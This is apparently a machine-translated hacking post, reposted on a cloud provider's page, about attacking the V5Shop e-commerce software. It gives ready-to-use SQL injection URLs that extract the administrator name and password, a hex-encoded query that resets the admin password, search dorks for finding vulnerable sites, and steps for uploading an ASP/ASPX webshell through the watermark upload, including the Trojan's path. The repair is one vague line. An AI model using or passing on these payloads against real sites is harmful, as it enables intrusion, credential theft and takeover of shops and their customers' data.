V5Shop injection vulnerability and repair

Source: Internet
Author: User

Aspx? Id = 1869 "> http://www.bkjia.com/commond.aspx? Id = 1869
There is no way to union. It can only make it violent and wrong.
Administrator username: http://www.bkjia.com/commond.aspx? Id = 1869 and 1 = (select top 1 [name] from web_admin )--
Brute force Administrator Password: http://www.bkjia.com/commond.aspx? Id = 1869 and 1 = (select top 1 [pass] from web_admin )--

Single quotes are filtered. Strings can only be converted into hexadecimal values.

Update administrator password: update web_admin set

Pass = 0x31004200460041004500370042004500410043004600350036003200330041003200430042

004400450037004400450041003600340042003700430037004300


Weblogin/System_Config_Operate.aspx
Upload a watermark in the background. You can upload the watermark directly.

Webshell
Remember, never upload the ASPX horse ...... otherwise it will not succeed.
You can upload the ASP horse first, and then the ASPX horse.
The path of the Trojan is uploadFile/Picture/Trojan. asp.

Keyword: services. aspxid =
Inurl: scoreindex. aspx
Default backend address: weblogin/Login. aspx

/Weblogin/index. aspx

Copy this code domain name + code
Cart. aspx? Act = buy & id = 1 and (Select Top 1 char (124) % 2 BisNull (cast ([Name] as varchar (8000), char (32 )) % 2 Bchar (124) % 2 BisNull (cast ([Pass] as varchar (8000), char (32) % 2 Bchar (124) from (Select Top 4 [Name], [Pass] From [Web_Admin] Where 1 = 1 Order by [Name], [Pass]) T Order by [Name] desc, [Pass] desc)> 0 --

Update administrator password: update web_admin setpass = 0x310042004600410045003700420045004100430046003500360032003300410032004300420044

00450037004400450041003600340042003700430037004300

Weblogin/System_Config_Operate.aspx
Upload a watermark in the background. You can upload the watermark directly.

Webshell in the background
Remember. Do not upload the ASPX horse ...... otherwise it will not succeed.
You can upload the ASP horse first, and then the ASPX horse.
The path of the Trojan is uploadFile/Picture/Trojan. asp.

Author: black noodle nest

Fix: Compare Filter

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.